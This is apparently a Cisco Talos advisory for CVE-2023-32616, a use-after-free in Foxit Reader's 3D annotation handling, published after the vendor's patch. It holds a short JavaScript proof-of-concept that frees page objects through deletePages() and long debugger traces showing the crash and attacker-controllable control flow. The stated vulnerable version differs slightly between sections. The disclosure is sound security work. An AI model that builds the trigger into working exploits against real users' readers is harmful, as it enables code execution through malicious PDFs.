CVE-2023-32616
A use-after-free vulnerability exists in the way Foxit Reader 12.1.2.15356 handles 3D annotations. A specially crafted Javascript code inside a malicious PDF document can trigger reuse of a previously freed object, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Foxit Reader 12.1.3.15356
Foxit Reader - https://www.foxitsoftware.com/pdf-reader/
8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-416 - Use After Free
Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.
Javascript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists a use-after-free vulnerability in the way Foxit Reader handles a 3D annotation object. This can be illustrated by the following proof-of-concept code:
function f4() {
app.activeDocs[0].getField('txt2').setFocus();
app.activeDocs[0].zoomType = zoomtype.fitP;
app.activeDocs[0].pageNum = 4;
}
function f123() {
app.activeDocs[0].getField('txt1').setFocus();
f4();
}
function delete_pages() {
app.activeDocs[0].deletePages();
}
In the above code, the function f4 is important. Specifically, when the value of pageNum is set to 4. This invokes the fifth page of the document. Note that the value of PageNum is 0-based. The fifth page of the document contains a call to the delete_pages function. The delete_pages function calls deletePages(), which in turn ends up freeing all the objects associated with the page. The use-after-free vulnerability occurs when a 3D annotation object is freed by deletePages() and is later used without any validation. We can observe the following in the debugger (with PageHeap enabled):
0:000> g
Breakpoint 0 hit
eax=073feeb0 ebx=073fef1c ecx=0289e7c0 edx=00000002 esi=19011d38 edi=19011dd0
eip=02bc2d39 esp=073fee88 ebp=073feec8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
FoxitPDFReader!FXJSE_GetClass+0x269:
02bc2d39 ffd1 call ecx {FoxitPDFReader!safe_vsnprintf+0xf11060 (0289e7c0)}
0:000> g
Breakpoint 0 hit
eax=073fed08 ebx=073fed74 ecx=0289c6c0 edx=00000002 esi=10a39aa0 edi=19182cf0
eip=02bc2d39 esp=073fece0 ebp=073fed20 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200206
FoxitPDFReader!FXJSE_GetClass+0x269:
02bc2d39 ffd1 call ecx {FoxitPDFReader!safe_vsnprintf+0xf0ef60 (0289c6c0)} ; <----------- [1]
[....]
0:000> p
eax=04a21534 ebx=107c99bc ecx=189afd40 edx=07500000 esi=107c99b0 edi=0e6df428
eip=00805d68 esp=073fc700 ebp=073feb28 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x41028:
00805d68 6a01 push 1
0:000> p
eax=04a21534 ebx=107c99bc ecx=189afd40 edx=07500000 esi=107c99b0 edi=0e6df428
eip=00805d6a esp=073fc6fc ebp=073feb28 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4102a:
00805d6a ff5004 call dword ptr [eax+4] ds:0023:04a21538=019300e0
0:000> t
eax=04a21534 ebx=107c99bc ecx=189afd40 edx=07500000 esi=107c99b0 edi=0e6df428
eip=019300e0 esp=073fc6f8 ebp=073feb28 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f8c90:
019300e0 55 push ebp
0:000> p
eax=04a21534 ebx=107c99bc ecx=189afd40 edx=07500000 esi=107c99b0 edi=0e6df428
eip=019300e1 esp=073fc6f4 ebp=073feb28 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f8c91:
019300e1 8bec mov ebp,esp
0:000> p
eax=04a21534 ebx=107c99bc ecx=189afd40 edx=07500000 esi=107c99b0 edi=0e6df428
eip=019300e3 esp=073fc6f4 ebp=073fc6f4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f8c93:
019300e3 56 push esi
0:000> p
eax=04a21534 ebx=107c99bc ecx=189afd40 edx=07500000 esi=107c99b0 edi=0e6df428
eip=019300e4 esp=073fc6f0 ebp=073fc6f4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f8c94:
019300e4 8bf1 mov esi,ecx
0:000> p
eax=04a21534 ebx=107c99bc ecx=189afd40 edx=07500000 esi=189afd40 edi=0e6df428
eip=019300e6 esp=073fc6f0 ebp=073fc6f4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f8c96:
019300e6 e8b5fcffff call FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f8950 (0192fda0)
0:000> p
eax=00000002 ebx=107c99bc ecx=1f2832ac edx=00000001 esi=189afd40 edi=0e6df428
eip=019300eb esp=073fc6f0 ebp=073fc6f4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f8c9b:
019300eb f6450801 test byte ptr [ebp+8],1 ss:0023:073fc6fc=01
0:000> p
eax=00000002 ebx=107c99bc ecx=1f2832ac edx=00000001 esi=189afd40 edi=0e6df428
eip=019300ef esp=073fc6f0 ebp=073fc6f4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f8c9f:
019300ef 740e je FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f8caf (019300ff) [br=0]
0:000> p
eax=00000002 ebx=107c99bc ecx=1f2832ac edx=00000001 esi=189afd40 edi=0e6df428
eip=019300f1 esp=073fc6f0 ebp=073fc6f4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f8ca1:
019300f1 6880000000 push 80h
0:000> p
eax=00000002 ebx=107c99bc ecx=1f2832ac edx=00000001 esi=189afd40 edi=0e6df428
eip=019300f6 esp=073fc6ec ebp=073fc6f4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f8ca6:
019300f6 56 push esi ; <---------- [2]
0:000> dd 189afd40 ; <---------- [3]
189afd40 04996ae4 0889b520 0f8c09a0 0e6df428
189afd50 e0e0e000 00000001 0c0d3418 01000101
189afd60 00000004 00000000 0e926ec0 00000000
189afd70 0c0d337c 0e316f20 193d2d48 00000000
189afd80 00000000 00000000 00000000 00000000
189afd90 00000010 00000000 00000000 00000000
189afda0 0000000a 00000000 00000000 00000000
189afdb0 e0e0e000 00000000 0c168650 00000000
0:000> p
eax=00000002 ebx=107c99bc ecx=1f2832ac edx=00000001 esi=189afd40 edi=0e6df428
eip=019300f7 esp=073fc6e8 ebp=073fc6f4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f8ca7:
019300f7 e8365f8c02 call FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x3b4702 (041f6032) ; <-----------------[4]
0:000> p
eax=00000001 ebx=107c99bc ecx=189afd40 edx=00000001 esi=189afd40 edi=0e6df428
eip=019300fc esp=073fc6e8 ebp=073fc6f4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f8cac:
019300fc 83c408 add esp,8
0:000> dd 189afd40 ; <-----------------[5]
189afd40 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afd50 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afd60 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afd70 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afd80 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afd90 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afda0 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afdb0 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
At [1] above, the method associated with deletePages() is called. This method calls a free function at [4], and the argument of the function comes from the esi register at [2]. The value of the vulnerable buffer is examined at [3], and [5] shows the value before and after the free function is called. The vulnerable buffer is an annotation object, and later it is used without any validation. This can be observed in a debugger at the time of the crash:
0:000> p
eax=10a36c40 ebx=073fdbc4 ecx=189afd40 edx=10a36c40 esi=073fdc3c edi=10a36c40
eip=2abf0cce esp=073fdb34 ebp=073fdbb8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
U3DBrowser!PlugInMain+0x2dd7e:
2abf0cce e8adfbffff call U3DBrowser!PlugInMain+0x2d930 (2abf0880)
0:000> t
eax=10a36c40 ebx=073fdbc4 ecx=189afd40 edx=10a36c40 esi=073fdc3c edi=10a36c40
eip=2abf0880 esp=073fdb30 ebp=073fdbb8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200246
U3DBrowser!PlugInMain+0x2d930:
2abf0880 56 push esi
0:000> pc
eax=019a23d0 ebx=073fdbc4 ecx=189afd40 edx=10a36c40 esi=189afd40 edi=10a36c40
eip=2abf08a3 esp=073fdb14 ebp=073fdbb8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202
U3DBrowser!PlugInMain+0x2d953:
2abf08a3 ffd0 call eax {FoxitPDFReader!safe_vsnprintf+0x14c70 (019a23d0)}
0:000> pc
eax=01a74c70 ebx=073fdbc4 ecx=0b0bda58 edx=0b468b70 esi=189afd40 edi=10a36c40
eip=2abf08a8 esp=073fdb20 ebp=073fdbb8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
U3DBrowser!PlugInMain+0x2d958:
2abf08a8 ffd0 call eax {FoxitPDFReader!safe_vsnprintf+0xe7510 (01a74c70)}
0:000> t
eax=01a74c70 ebx=073fdbc4 ecx=0b0bda58 edx=0b468b70 esi=189afd40 edi=10a36c40
eip=01a74c70 esp=073fdb1c ebp=073fdbb8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
FoxitPDFReader!safe_vsnprintf+0xe7510:
01a74c70 55 push ebp
0:000> p
eax=01a74c70 ebx=073fdbc4 ecx=0b0bda58 edx=0b468b70 esi=189afd40 edi=10a36c40
eip=01a74c71 esp=073fdb18 ebp=073fdbb8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
FoxitPDFReader!safe_vsnprintf+0xe7511:
01a74c71 8bec mov ebp,esp
0:000> p
eax=01a74c70 ebx=073fdbc4 ecx=0b0bda58 edx=0b468b70 esi=189afd40 edi=10a36c40
eip=01a74c73 esp=073fdb18 ebp=073fdb18 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
FoxitPDFReader!safe_vsnprintf+0xe7513:
01a74c73 8b4d08 mov ecx,dword ptr [ebp+8] ss:0023:073fdb20=189afd40
0:000> p
eax=01a74c70 ebx=073fdbc4 ecx=189afd40 edx=0b468b70 esi=189afd40 edi=10a36c40
eip=01a74c76 esp=073fdb18 ebp=073fdb18 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
FoxitPDFReader!safe_vsnprintf+0xe7516:
01a74c76 8b01 mov eax,dword ptr [ecx] ds:0023:189afd40=f0f0f0f0
0:000> dd ecx ;<-------------------- [6]
189afd40 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afd50 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afd60 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afd70 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afd80 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afd90 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afda0 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
189afdb0 f0f0f0f0 f0f0f0f0 f0f0f0f0 f0f0f0f0
0:000> p
eax=f0f0f0f0 ebx=073fdbc4 ecx=189afd40 edx=0b468b70 esi=189afd40 edi=10a36c40
eip=01a74c78 esp=073fdb18 ebp=073fdb18 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
FoxitPDFReader!safe_vsnprintf+0xe7518:
01a74c78 5d pop ebp
0:000> p
eax=f0f0f0f0 ebx=073fdbc4 ecx=189afd40 edx=0b468b70 esi=189afd40 edi=10a36c40
eip=01a74c79 esp=073fdb1c ebp=073fdbb8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200212
FoxitPDFReader!safe_vsnprintf+0xe7519:
01a74c79 ff6010 jmp dword ptr [eax+10h] ds:0023:f0f0f100=????????
0:000> g
(7c0.1c8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=f0f0f0f0 ebx=073fdbc4 ecx=189afd40 edx=0b468b70 esi=189afd40 edi=10a36c40
eip=01a74c79 esp=073fdb1c ebp=073fdbb8 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210212
FoxitPDFReader!safe_vsnprintf+0xe7519:
01a74c79 ff6010 jmp dword ptr [eax+10h] ds:0023:f0f0f100=???????? ;<-------------------- [7]
0:000> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 073fdbb8 2abf5937 01ebc8d3 18b03e78 2abf5937 FoxitPDFReader!safe_vsnprintf+0xe7519
01 073fdc58 0084bd12 00000000 00000000 00000000 U3DBrowser!PlugInMain+0x329e7
02 073fdc78 007cd14d 100f3d60 100f3d60 0c0d3940 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x86fd2
03 073fdc94 016c43e1 00000000 073fe904 007d55ab FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x840d
04 073fdca0 007d55ab 100f3d60 0c2767a0 00000001 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x28cf91
05 073fe904 007d4fb7 00000001 00000001 1f281d68 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x1086b
06 073fe92c 016d1159 00000001 1f281d1c 0c2767a0 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x10277
07 073fe958 016ccb5f 0ea5a458 0c0d3418 0c0d3930 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x299d09
08 073fe96c 016c5b69 0c2767a0 1f281db8 0c2767a0 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x29570f
09 073fe9fc 019478f1 0c2767a0 1f281e68 0c0d3418 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x28e719
0a 073fea2c 00e00af8 0f8bfa10 1f281e38 ffffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x5104a1
0b 073fea7c 007ccc85 0c2767a0 1f281ef4 100f3f3c FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2e6258
0c 073feab0 007cca14 00000000 1f281f50 0b04e174 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x7f45
0d 073feb14 01a69c53 00000000 0f8c5680 073feb38 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x7cd4
0e 073feb24 502ac7fd 100f3d60 00000000 00000000 FoxitPDFReader!safe_vsnprintf+0xdc4f3
0f 073feb38 019c60f5 0e881c18 100f3d60 073fec48 Signature!PlugInMain+0x6cd
10 073feb4c 0084cc1b 100f3d60 073fec48 0b04e168 FoxitPDFReader!safe_vsnprintf+0x38995
11 073feb6c 0083ddd9 073feba4 073fec48 1f281fd8 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x87edb
12 073feb9c 007cf916 100f3d60 073fec48 100f3d60 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x79099
13 073febb0 007d01a1 073fec48 1f281854 0f49c1a0 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0xabd6
14 073fec10 007d02cd 00000000 00000000 073fec2c FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0xb461
15 073fec20 00f8fbe1 073fec48 073fec84 028d120c FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0xb58d
16 073fec2c 028d120c 073fec48 1f2818c0 19182cf0 FoxitPDFReader!CryptUIWizExport+0x2fe91
17 073fec84 0289c812 19182cf0 00000000 10a39988 FoxitPDFReader!safe_vsnprintf+0xf43aac
18 073fecd8 02bc2d3b 19182cf0 073fed08 073fed00 FoxitPDFReader!safe_vsnprintf+0xf0f0b2
19 073fed20 02da708b 104563c8 10e29785 104563c8 FoxitPDFReader!FXJSE_GetClass+0x26b
1a 073fed88 02da684e 073fedd0 10e29785 073feeac FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3c7b
1b 073fee1c 02da6b05 073fee4c 104563c8 073feeac FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e343e
1c 073fee64 02da698b 073fee7c 00000005 073feeb8 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e36f5
1d 073fee80 02fc8d1b 00000005 073feeb8 104563c8 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e357b
1e 073feea0 02f64d79 0a9c2339 183d23d5 0000000a FoxitPDFReader!CFXJSE_Arguments::GetValue+0x40590b
1f 073feed8 02f64d79 3f20c76d 3b1865c1 3b186605 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1969
20 073fef04 02f63400 3f20c76d 0a9c21b1 3b1865c1 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1969
21 073fef1c 02f63229 00000000 00000000 00000002 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39fff0
22 073fef48 02bff59e 104563c8 0a9c2339 3b1865c1 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39fe19
23 073ff058 02bff0b2 073ff1ec 104563c8 073ff0b4 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3c18e
24 073ff0e0 02be7da4 073ff1ec 104563c8 1922a7b4 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3bca2
25 073ff290 02be78a0 073ff32c 1922a7d8 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24994
26 073ff2a4 02bc12af 073ff32c 1922a7d8 1f280758 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24490
27 073ff31c 02bc1be6 1922a7b4 19187b98 1922a7a0 FoxitPDFReader!FXJSE_Runtime_Release+0xd5f
28 073ff358 0283f2f4 0c192bc8 0ae3f50c 19187b98 FoxitPDFReader!FXJSE_ExecuteScript+0x86
29 073ff3bc 028401e0 00000000 073ff470 073ff420 FoxitPDFReader!safe_vsnprintf+0xeb1b94
2a 073ff3d0 02826555 073ff470 073ff420 0b46f020 FoxitPDFReader!safe_vsnprintf+0xeb2a80
2b 073ff3ec 00de1297 0ea65db8 0000000a 073ff41c FoxitPDFReader!safe_vsnprintf+0xe98df5
2c 073ff434 00de02e0 100f3d60 0000000a 073ff470 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c69f7
2d 073ff468 00ddf651 0f8e07a0 0000000a 100f3d60 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c5a40
2e 073ff4bc 00977124 073ff4fc 0000000a 100f3d60 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c4db1
2f 073ff510 009803e1 1f28017c 19488e38 00000003 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x74614
30 073ff538 009801fc 00000004 7fffffff 0097ff60 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x7d8d1
31 073ff620 04013983 00000432 00000000 00000000 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x7d6ec
32 073ff644 0400e327 00000432 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1d2053
33 073ff6b8 0400eb9a 19488e38 004d08aa 00000432 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1cc9f7
34 073ff6d8 77033cb7 004d08aa 00000432 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1cd26a
35 073ff704 770140dc 0400eb66 004d08aa 00000432 USER32!_InternalCallWinProc+0x2b
36 073ff7ec 77013bd3 004d08aa 00000432 00000000 USER32!UserCallWinProcCheckWow+0x26c
37 073ff85c 770139f0 00000332 073ff884 008ed3c4 USER32!DispatchMessageWorker+0x1d3
38 073ff868 008ed3c4 088927a0 088927a0 05e73738 USER32!DispatchMessageW+0x10
39 073ff884 008ed483 05e73738 008ed3f0 ffffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x128684
3a 073ff8a4 0443021e 00000000 05e9fab4 074ff000 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x128743
3b 073ff8bc 041f5f48 004d0000 00000000 08831f0c FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x5ee8ee
3c 073ff908 76c2d109 074ff000 76c2d0f0 073ff974 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x3b4618
3d 073ff918 778f24ed 074ff000 9887f4a8 00000000 KERNEL32!BaseThreadInitThunk+0x19
3e 073ff974 778f24c1 ffffffff 77975e66 00000000 ntdll!__RtlUserThreadStart+0x2b
3f 073ff984 00000000 041f6017 074ff000 00000000 ntdll!_RtlUserThreadStart+0x1b
At [6] above, we can observe ecx contains the same memory pointer, which belongs to a freed allocation. The value in ecx is dereferenced at [7], a jump call to the dereferenced value. This directly leads to a use-after-free condition and results in a crash. This would give an attacker direct control over execution control flow.
Since additional Javascript code can be executed between object free and reuse, freed memory could be put under attacker control. With careful memory layout manipulation, this can lead to further memory corruption and ultimately arbitrary code execution.
2023-09-18 - Vendor Disclosure
2023-11-22 - Vendor Patch Release
2023-11-27 - Public Release
Discovered by Kamlapati Choubey of Cisco Talos.